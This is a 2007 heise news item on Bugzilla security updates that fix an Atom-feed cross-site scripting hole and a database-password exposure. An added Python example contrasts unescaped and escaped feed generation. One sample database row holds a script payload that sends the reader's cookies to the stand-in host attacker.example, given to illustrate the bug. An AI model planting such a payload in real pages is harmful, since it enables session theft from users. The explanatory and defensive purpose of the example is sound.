In association with heise online

05 February 2007, 15:36

Bugzilla developers remedy vulnerabilities


Versions 2.20.4, 2.22.2 and 2.23.4 of the Bugzilla bug tracking system have been released. According to the accompanying advisory, the update closes two critical vulnerabilities: a cross-site scripting (XSS) hole that can be triggered through manipulated database entries, and a flaw that can disclose the database password.

The XSS hole concerns the Atom feeds in Bugzilla 2.20.1 and later. JavaScript contained in database entries may be passed on to the feed reader as part of the feed, and readers that support JavaScript may then execute it, potentially giving an attacker access to sensitive user data.
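As an added illustration of this bug class (example code written for this page in Python, not Bugzilla's own Perl code), the block below builds a minimal Atom feed from constructed bug rows, once by interpolating the stored text directly and once after escaping it, and then reads both feeds back the way a feed consumer would. The bug summaries, the bug ids and the attacker.example host are constructed sample data.

```python
"""Added example (not Bugzilla's own code): escaping database-sourced text
before it is placed in an Atom feed, and what a feed consumer sees when
that escaping is missing.  The bug rows below are constructed."""
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

ATOM_NS = "http://www.w3.org/2005/Atom"

# Constructed sample rows as they might come back from the bugs table.
# Row 102 is a summary an attacker could have stored through the bug form;
# row 103 is an innocent summary that happens to contain '<' and '&'.
BUGS = [
    (101, "Login page returns 500 on empty password"),
    (102, '<script>document.location="http://attacker.example/?c="+document.cookie</script>'),
    (103, 'Search for "a < b & c" returns nothing'),
]


def feed_vulnerable(bugs):
    """Interpolates raw database values into the feed.  Markup stored in a
    summary becomes markup in the feed, which a reader may render or run."""
    entries = "".join(
        f"<entry><id>{bug_id}</id><title>{summary}</title></entry>"
        for bug_id, summary in bugs
    )
    return f'<feed xmlns="{ATOM_NS}">{entries}</feed>'


def feed_fixed(bugs):
    """Escapes every database value so the reader receives text, not markup.
    escape() turns & < > into entity references; the reader's XML parser
    decodes them back into plain characters of the title text."""
    entries = "".join(
        f"<entry><id>{escape(str(bug_id))}</id>"
        f"<title>{escape(summary)}</title></entry>"
        for bug_id, summary in bugs
    )
    return f'<feed xmlns="{ATOM_NS}">{entries}</feed>'


def read_feed(xml_text):
    """Minimal feed consumer.  Returns a list of (title text, tags of any
    child elements that leaked into <title>), or None when the feed is not
    well-formed XML (an unescaped '<' or '&' breaks the whole feed)."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    titles = []
    for entry in root.findall(f"{{{ATOM_NS}}}entry"):
        title = entry.find(f"{{{ATOM_NS}}}title")
        # Child elements of <title> only exist if markup was not escaped.
        leaked = [child.tag.split("}")[-1] for child in title]
        titles.append((title.text or "", leaked))
    return titles


def leaked_markup(bugs):
    """Returns, per entry, the element tags that survive into the vulnerable
    feed as real elements, i.e. what a JavaScript-capable reader could run."""
    parsed = read_feed(feed_vulnerable(bugs)) or []
    return [tags for _, tags in parsed if tags]


if __name__ == "__main__":
    print("vulnerable, all rows :", read_feed(feed_vulnerable(BUGS)))
    print("vulnerable, rows 1-2 :", read_feed(feed_vulnerable(BUGS[:2])))
    print("fixed, all rows      :", read_feed(feed_fixed(BUGS)))
```

Run as a script, the vulnerable feed built from all three rows does not even parse (row 103 breaks it), while the one built from the first two rows parses and delivers a real script element inside the title of bug 102; the escaped feed carries all three summaries as plain text. The same rule applies to every other database-sourced field that ends up in the feed, not just the title.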

The flaw in the handling of the database password only affects version 2.23.2 of Bugzilla, and only when it runs under the Apache module mod_perl. A missing entry in a block of the Apache configuration renders the .htaccess file, which is meant to stop the web server from serving files that must not be reachable from outside, ineffective. Apache only consults a .htaccess file when the enclosing <Directory> block permits it through an AllowOverride directive (the host access-control directives require AllowOverride Limit); without that, the file is silently ignored and the web server serves everything in the directory. Attackers may then be able to read the file containing the database credentials remotely.

According to the Bugzilla developers, the 2.18.x versions contain neither of the two vulnerabilities. Administrators of more recent versions should, however, upgrade to the fixed release of their branch as quickly as possible.
